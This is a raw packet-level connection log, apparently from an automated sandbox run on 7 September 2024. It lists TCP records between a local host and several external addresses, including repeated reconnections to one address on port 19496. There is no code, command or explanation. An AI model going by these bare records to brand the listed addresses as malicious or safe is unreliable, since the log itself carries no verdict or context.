                                      Sep 7, 2024 01:47:41.530597925 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530716896 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.532512903 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.219212055 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.219273090 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.219389915 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.221890926 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.221906900 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.687169075 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.687274933 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.689735889 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.689745903 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.689990997 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.702713013 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.744503975 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.814980030 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.815052986 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.815396070 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.817173958 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.826802969 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.826841116 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:45.826922894 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.827218056 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.827234030 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:45.854971886 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:45.859785080 CEST8049731208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:45.861113071 CEST4973180192.168.2.5208.95.112.1
Sep 7, 2024 01:47:45.861299038 CEST  49731  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:45.866040945 CEST  80  49731  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:46.022404909 CEST  19496  49728  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:46.022475958 CEST  49728  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:46.303070068 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.303184032 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.304349899 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.304358006 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.304739952 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.305510998 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.352492094 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.654433012 CEST  80  49731  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:46.654824972 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.654838085 CEST  80  49731  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:46.654879093 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.654886007 CEST  49731  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:46.654906034 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.654920101 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.654934883 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.654973984 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.654987097 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.654995918 CEST  443  49730  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:46.655034065 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.657810926 CEST  49730  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:46.667299032 CEST  49731  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:46.672354937 CEST  80  49731  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:46.672406912 CEST  49731  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:48.876451015 CEST  49728  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:49.271950960 CEST  19496  49728  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:49.285444021 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:49.285489082 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:49.285547972 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:49.286094904 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:49.286111116 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:49.331330061 CEST  49733  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:49.336178064 CEST  19496  49733  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:49.336285114 CEST  49733  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:49.498176098 CEST  49733  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:49.502984047 CEST  19496  49733  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:49.721319914 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:49.721376896 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:49.721882105 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:49.724082947 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:49.724093914 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:49.748125076 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:49.748229027 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:49.774720907 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:49.774746895 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:49.774990082 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:49.787568092 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:49.787817955 CEST  49708  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:49.794353962 CEST  80  49708  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:49.794425964 CEST  49708  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:49.832510948 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.156783104 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.166019917 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.166043997 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.196436882 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:50.196556091 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:50.197922945 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:50.197933912 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:50.198175907 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:50.209713936 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:50.252496958 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:50.329401970 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:50.329458952 CEST  443  49734  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:50.329792023 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:50.330869913 CEST  49734  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:50.338387966 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.338428974 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.338664055 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.338911057 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.338923931 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.445755005 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.445873022 CEST  443  49732  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.445933104 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.446939945 CEST  49732  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.448007107 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.448045969 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.448113918 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.448343992 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.448355913 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.807161093 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.807240009 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.808618069 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.808629036 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.808856010 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.809726954 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.856515884 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.921236038 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.922745943 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:50.922760010 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:50.961648941 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.961698055 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.961733103 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.961795092 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.961822033 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.961834908 CEST  443  49735  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:50.961865902 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.961899042 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:50.971801996 CEST  49735  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:51.056814909 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.057554007 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.057576895 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.057775974 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.057780981 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.057831049 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.057845116 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.057884932 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.057890892 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.057946920 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.057954073 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.057996988 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058003902 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058096886 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058104992 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058128119 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058135033 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058182001 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058187962 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058211088 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058221102 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058341026 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058348894 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058367014 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058374882 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058377028 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058393955 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058423042 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058429956 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058543921 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058552027 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058564901 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058571100 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058665991 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058675051 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058692932 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058700085 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058738947 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058751106 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058778048 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058787107 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058798075 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058803082 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058820963 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058825970 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058871984 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058880091 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058893919 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058902979 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058911085 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058914900 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058948994 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.058957100 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.058995008 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059001923 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059062004 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059070110 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059084892 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059091091 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059163094 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059170008 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059259892 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059267044 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059308052 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059317112 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059333086 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059339046 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.059386969 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.059391022 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.757196903 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.757365942 CEST  443  49738  162.159.135.232  192.168.2.5
Sep 7, 2024 01:47:51.757452965 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:51.803704023 CEST  49738  443  192.168.2.5  162.159.135.232
Sep 7, 2024 01:47:52.070091963 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.070147038 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.070373058 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.072400093 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.072412014 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.858772993 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.858851910 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.860239029 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.860249996 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.860461950 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.871891022 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.912503004 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.993165970 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.993240118 CEST  443  49739  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:52.993294001 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:52.993971109 CEST  49739  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:53.006922960 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.006958008 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.007055998 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.007303953 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.007316113 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.273792028 CEST  49743  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:53.281080008 CEST  80  49743  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:53.281153917 CEST  49743  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:53.281275034 CEST  49743  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:53.288460970 CEST  80  49743  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:53.465930939 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.465995073 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.467298031 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.467309952 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.467535973 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.468400955 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.512491941 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.633152962 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.633204937 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.633234024 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.633275986 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.633292913 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.633312941 CEST  443  49742  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:53.633331060 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.633348942 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.635226011 CEST  49742  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:53.739532948 CEST  80  49743  208.95.112.1  192.168.2.5
Sep 7, 2024 01:47:53.781768084 CEST  49743  80  192.168.2.5  208.95.112.1
Sep 7, 2024 01:47:54.241756916 CEST  19496  49733  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:54.241837978 CEST  49733  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:56.689965010 CEST  49733  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:56.692099094 CEST  49747  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:56.696062088 CEST  19496  49733  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:56.700799942 CEST  19496  49747  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:56.700856924 CEST  49747  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:56.755554914 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:56.755599976 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:56.755861044 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:56.758188009 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:56.758197069 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:56.830828905 CEST  49747  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:47:56.898606062 CEST  19496  49747  147.185.221.22  192.168.2.5
Sep 7, 2024 01:47:57.462372065 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:57.462474108 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:57.464059114 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:57.464066029 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:57.464322090 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:57.477478981 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:57.524502993 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:57.606251955 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:57.606344938 CEST  443  49748  188.114.97.3  192.168.2.5
Sep 7, 2024 01:47:57.606600046 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:57.607100010 CEST  49748  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:47:57.617018938 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:57.617079020 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:57.617271900 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:57.617531061 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:57.617547989 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.103421926 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.103508949 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:58.104892015 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:58.104903936 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.105154991 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.110207081 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:58.152512074 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.278475046 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.278543949 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.278574944 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.278673887 CEST  443  49749  104.21.85.189  192.168.2.5
Sep 7, 2024 01:47:58.278701067 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:58.278731108 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:47:58.280548096 CEST  49749  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:00.020921946 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.020967007 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.021071911 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.023076057 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.023092031 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.491702080 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.491776943 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.493769884 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.493782043 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.494052887 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.511434078 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.556503057 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.648638964 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.648701906 CEST  443  49750  188.114.97.3  192.168.2.5
Sep 7, 2024 01:48:00.648752928 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.649465084 CEST  49750  443  192.168.2.5  188.114.97.3
Sep 7, 2024 01:48:00.666784048 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:00.666820049 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:00.667193890 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:00.667440891 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:00.667449951 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.120014906 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.120085955 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.121630907 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.121639967 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.121867895 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.122735023 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.168494940 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.278603077 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.278651953 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.278680086 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.278744936 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.278773069 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.278786898 CEST  443  49751  104.21.85.189  192.168.2.5
Sep 7, 2024 01:48:01.278924942 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.278924942 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.286782980 CEST  49751  443  192.168.2.5  104.21.85.189
Sep 7, 2024 01:48:01.733351946 CEST  19496  49747  147.185.221.22  192.168.2.5
Sep 7, 2024 01:48:01.733438969 CEST  49747  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:48:01.741503000 CEST  49747  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:48:01.746510029 CEST  19496  49747  147.185.221.22  192.168.2.5
Sep 7, 2024 01:48:01.779366970 CEST  49752  19496  192.168.2.5  147.185.221.22
Sep 7, 2024 01:48:01.784207106 CEST  19496  49752  147.185.221.22  192.168.2.5
Sep 7, 2024 01:48:01.784440994 CEST  49752  19496  192.168.2.5  147.185.221.22
